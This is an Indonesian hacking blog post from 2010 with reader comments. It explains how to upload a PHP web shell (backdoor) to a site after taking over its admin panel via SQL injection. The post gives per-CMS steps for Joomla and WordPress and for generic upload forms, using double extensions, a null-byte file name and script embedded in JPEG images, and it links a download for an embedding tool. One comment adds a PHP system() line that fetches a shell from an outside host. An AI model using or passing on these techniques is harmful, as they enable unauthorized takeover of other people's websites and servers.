Mungkin ada kendala yah setelah takeover web lewat bug sqli, kita cuma dapet akses ke panel admin, berbahagialah kalo cmsnya ada fitus upload gambar, hehehe :D kendalanya cuma upload gambar, upload php? ini gunanya tutorial ini ;)
Jika cms target Joomla
anda dapat mengubah file yang dapat di upload di media pada settingan di Global Configuration di tab system tambah ekstensi php kemudian save. Setelah itu upload shell anda di media manajemen. shell anda akan berada pada direktori site.name/images/namaphpshellnya.php
Jika cms target Wordpress
anda dapat mengupload BD dengan cara mengkompres dahulu phpshell anda ke dalam format *.zip , kemudian add new plugins , pilih upload , upload phpshell.zip anda, file tersebut akan berada pada direktori site.nama/wp-content/plugins/namafolderzipnya/namaphpshellnya.php
Jika cms target cms biasa / selain diatas
anda dapat mengupload phpshell anda di bagian dimana terdapat form upload picture, sebelumnya ubah dulu ekstensi phpshell anda menjadi namashell.php.jpg atau dengan null byte menjadi: namashell.php%00.jpg
Jika cms tidak menerima upload shell dengan nullbyte
Pakai aplikasi kecil bernama edjpgcom, aplikasi ini bisa menulis suatu skrip kedalam sebuah file gambar
DOWNLOAD: http://www.chapelhill.homeip.net/horton/copies/edjpgcom/edjpgcom.zip
lalu diekstrak, saya sarankan diekstrak di C: (C:\edjpgcom.exe)
Cara memakainya, buka command prompt, lalu arahkan (ganti current directory) ke C:\
sebelum itu, siapkan file gambarnya, dan taruh di C:\ juga misal: gambar.jpg
kembali ke command prompt, ketik "edjpgcom.exe gambar.jpg" (tanpa tanda kutip pastinya) ntar ada keuar form, nah, tinggal masukkan skrip kalian lalu OK
Sekarang file anda sudah ada skripnya
Sekian dulu dari saya
Thanks to: r3m1ck dan zee_eichel dari Tecon
Terimakasih
\\EOF
Sabtu, 26 Juni 2010
Aneka cara upload Shell aka Backdoor
Sabtu, Juni 26, 2010
Admin
14 komentar:
Kalau gak ada fitur upload gbar gimana mas? Soalnya saya pernah menjumpai web yang admin panelnya cuman bisa nambah,del,dan edit artikel aja.
Thanks.
Kalo begitu, karena kebanyakan cms kayak gitu 'ecek-ecek', maka mungkin aja bisa pakek command bash (linux) kedalam artikel '<? system("http://webmu.com/phpshellkamu.txt shell.php"); ?>'
CMIIW
kalo misalnya add articlenya bisa buat html bisa ente buat script kaya yang dicontohkan sama neodark
kakak, aku pasang di vista tapi kok eror trus ya????langsung "stop working" om....gimana dung????
maksudnya server target vista? gak bisa lah, itu kan command linux ;)
anda dapat mengubah file yang dapat di upload di media pada settingan di Global Configuration di tab system tambah ekstensi php kemudian save. Setelah itu upload shell anda di media manajemen. shell anda akan berada pada direktori site.name/images/namaphpshellnya.php
ngubah file cara nya gimana gan? bukan nya ntar tulisan nya. infalid ekstention. atau infalid image or jpg format?
Maskudnya nanti gambar.jpg nya ada skripnya trus kalo gambarnya dieksekusi skripnya bisa langsung jalan, gitu ya?
misal kita buka : www.situstarget.com/image/gambar.jpg
mohon pencerahannya, trimakasih
@mark abene: wah, thx yah atas koreksinya, saya lupa cek lagi nih tutorial masih bisa apa kagak, nanti saya edit.
@scream: seharusnya bisa :)
@neo:bukan om, ku buka aplikasi tersebut di vista kok tidak bisa ya????langsung stop working.....sudah ku coba berulang-ulang dan ku dah download lagi tetep gak bisa work...napa ya?????
Tetep gak bisa Kk, yang kluar malah gambarnya aja, scriptnya gak bisa jalan.
tu berlaku cuma buat CMS ya??
@lenzmo: saya sih coba di xp yah, gak tau kalo di vista
@scr3am: ini udah diskusi saya sama narasumber (zee_eichel) kata dia juga harusnya bisa jalan.
@hiuputih: yup
[...] ne0 d4rk fl00d3r on Aneka cara upload Shell aka Backdoor [...]
Ga bisa keluar script'y??
Cuma gambar aja ..
Posting Komentar